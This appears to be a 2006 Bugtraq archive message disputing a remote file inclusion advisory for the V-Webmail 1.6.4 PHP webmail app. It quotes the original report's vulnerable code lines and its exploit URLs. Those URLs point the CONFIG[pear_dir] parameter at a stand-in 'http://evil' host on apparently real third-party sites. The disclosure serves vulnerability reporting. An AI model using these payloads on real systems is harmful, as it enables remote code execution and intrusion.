[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: V-Webmail 1.6.4 Remote File Include

To: bugs@xxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, submit@xxxxxxxxxxx
Subject: Re: V-Webmail 1.6.4 Remote File Include
From: "Ventsislav Genchev" <vigour1@xxxxxxxxx>
Date: Tue, 30 May 2006 11:39:04 +0300

Tested with register_globals = Off ... no affect..

Regards,
Ventsi

On 5/25/06, beford <xbefordx@xxxxxxxxx> wrote:

Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford <xbefordx gmail com>
Vulnerable File

v-webmail/includes/pear/*/*.php => require_once ($CONFIG['pear_dir'] . '*.php');
v-webmail/includes/mailaccess/pop3.php =>
require_once($CONFIG['pear_dir'] . 'Net/POP3.php');

Version 1.3
http://www.site.th/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil
http://www.woot.com.kh/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://evil

Version 1.5  - 1.6.4
http://something.ie/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://evil

References:
- V-Webmail 1.6.4 Remote File Include
  - From: beford

Prev by Date: Re: [Info Disclosure] Diesel PHP Job Site Latest Version
Next by Date: Xss exploit in Chipmunk directory
Previous by thread: V-Webmail 1.6.4 Remote File Include
Next by thread: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2
Index(es):
- Date
- Thread